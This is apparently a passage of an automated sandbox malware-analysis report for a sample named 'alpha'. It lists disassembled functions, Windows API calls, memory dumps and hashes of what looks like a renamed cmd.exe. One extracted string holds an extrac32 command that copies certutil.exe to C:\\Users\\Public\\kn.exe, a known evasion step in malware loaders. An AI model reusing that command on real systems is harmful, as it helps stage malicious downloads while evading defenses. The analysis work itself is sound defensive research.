                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValueVersion
                                                                                      • String ID: %d.%d.%05d.%d
                                                                                      • API String ID: 2996790148-3457777122
                                                                                      • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                      • Instruction ID: 5c05a638cb13d1f0042f0f1ff7b2ec6f4e399e0deb54d4deb5cc3f6744598a3b
                                                                                      • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                      • Instruction Fuzzy Hash: EDF0A761A0C38587E760AF25B48406AE695FB8C781F944134D94A17B59CF3CD514CB50
                                                                                      Function 00007FF793757854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ErrorFileFindFirstLast
                                                                                      • String ID:
                                                                                      • API String ID: 2831795651-0
                                                                                      • Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                                                                      • Instruction ID: 43f04349fae6672ff4121fbd25553c29a61a8875732aa436b0a39c288e4c361d
                                                                                      • Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                                                                      • Instruction Fuzzy Hash: 6AD1E472A0878296E7B8AF35E4D02AAB3A9FB48794F901136DE4D27794DF3CD541CB10
                                                                                      Function 00007FF793747D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00007FF793747DA1
                                                                                        • Part of subcall function 00007FF79375417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7937541AD
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF793747EB7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                      • String ID:
                                                                                      • API String ID: 168394030-0
                                                                                      • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                      • Instruction ID: 380368a43a885dcd59d3f8f1a700ad94268da354d2dbefbadd514fc4cd035330
                                                                                      • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                      • Instruction Fuzzy Hash: 4CA1F821B0C68695FBF8AB3594D42B9A396FF8C784F804136D91E676E5DF3CE8058320
                                                                                      Function 00007FF7937589E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationQueryToken
                                                                                      • String ID:
                                                                                      • API String ID: 4239771691-0
                                                                                      • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                      • Instruction ID: 5ccda49e4c33dca3ea3f06259198d7ef9e3a9f4aacfb780ecc9ae8bb95f359a9
                                                                                      • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                      • Instruction Fuzzy Hash: 59118272B18781DBFB609F11E4803A9FBA8FB88795F444132DB48127A4DB7CD588CB51
                                                                                      Function 00007FF793758114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileInformation$HandleQueryVolume
                                                                                      • String ID:
                                                                                      • API String ID: 2149833895-0
                                                                                      • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                      • Instruction ID: f3ec6496aa6fd5018c3b6c43816e9508ad8f7a8840dd5ecf7ea5779118e49c6c
                                                                                      • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                      • Instruction Fuzzy Hash: 2A1191317086C287E7B09B61F4803AAF7A4FB88B44F805135DA8D62A54DFBCD848CB10
                                                                                      Function 00007FF793748510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • towupper.MSVCRT ref: 00007FF7937485D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                      • String ID:
                                                                                      • API String ID: 3520273530-0
                                                                                      • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                      • Instruction ID: 601d528181ead93c3b46ed4fef7f3909367bdeccaa3ca22bc6363a51146acbb1
                                                                                      • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                      • Instruction Fuzzy Hash: 6961C221A0820691F7F8BF349588379E6E9FB1C794F808136DA1E762D5DF3DA8908231
                                                                                      Function 00007FF79375898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationQueryToken
                                                                                      • String ID:
                                                                                      • API String ID: 4239771691-0
                                                                                      • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                      • Instruction ID: c25d42885753497845a52907855268569ca1690f8844494c5813c33184599f22
                                                                                      • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                      • Instruction Fuzzy Hash: 6FF030B3714B81CBD7009F64E58449CB778F748B84B95853ACB2903704DB75D9A4CB50
                                                                                      Function 00007FF7937593B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7937593BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                      • Instruction ID: ca47975138509e2284d60b8d2212b51269b7d8bc9139629d49ed6665516c5eb3
                                                                                      • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                      • Instruction Fuzzy Hash: 43B09210E65442D1E658BB319CC106452A46B6D711FC00472C00E94260DE1C929B8720
                                                                                      Function 00007FF79374F8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF79374F52A,00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F8DE
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F8FB
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F951
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F96B
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FA8E
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79374FB14
                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FB2D
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FBEA
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79374F996
                                                                                        • Part of subcall function 00007FF793750010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF79376849D,?,?,?,00007FF79376F0C7), ref: 00007FF793750045
                                                                                        • Part of subcall function 00007FF793750010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF79376F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF793750071
                                                                                        • Part of subcall function 00007FF793750010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793750092
                                                                                        • Part of subcall function 00007FF793750010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7937500A7
                                                                                        • Part of subcall function 00007FF793750010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793750181
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D401
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D41B
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D435
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D480
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                      • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                      • API String ID: 3964947564-518410914
                                                                                      • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                      • Instruction ID: 4dea3c7923613abccdd6491e998231a6ebaf1f18d6c0d7ad5f0db015f76b0458
                                                                                      • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                      • Instruction Fuzzy Hash: 02026A21A19A4286FAB8BB31A8C4179E6ADFF4DB55FD44536D90E623A0DF3CB401C731
                                                                                      Function 00007FF7937502A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$iswspacewcschr
                                                                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                      • API String ID: 840959033-3627297882
                                                                                      • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                      • Instruction ID: 55caf40d60eed00f949c72f76f33d469d593bea933cac95817ffe81c0b68df98
                                                                                      • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                      • Instruction Fuzzy Hash: 3DD17C20E08643C6FBF8BB31A8C42B9A6A8BF5DB45FC45436D54E662A5DF3CE4058731
                                                                                      Function 00007FF79375081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$EnvironmentVariable
                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                      • API String ID: 198002717-267741548
                                                                                      • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                      • Instruction ID: 5263a2895660247c5ef798a28a5fe3f884b47812d10c1880a179b9e411a0a438
                                                                                      • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                      • Instruction Fuzzy Hash: 00510F25A0864385FAB46B31A894279EBA8FF4EB81FC49036C90F63764DF2CE544D771
                                                                                      Function 00007FF79374EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F000
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F031
                                                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F0D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: iswdigitiswspacewcschr
                                                                                      • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                      • API String ID: 1595556998-2755026540
                                                                                      • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                      • Instruction ID: 7ecbfe9fcd43fc465668ead06ba1a5e5a9ca71fe1127063ad6c4e286548fcb8a
                                                                                      • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                      • Instruction Fuzzy Hash: 68226B65E0865781FAF47B35A4C827AE6AAFF0D791FC04932D94D662E4DF3CB4428630
                                                                                      Function 00007FF79374D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                      • String ID: "$=,;
                                                                                      • API String ID: 3545743878-4143597401
                                                                                      • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                      • Instruction ID: b2e8960b1b37de8069ba7c188ce3c53e5b98225d36385220c2ea773aaba1f50d
                                                                                      • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                      • Instruction Fuzzy Hash: 75C1B165A0865282FBB57B219488379F6EAFF4DF45F848035CA8E22395EF3CB441C661
                                                                                      Function 00007FF793765BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
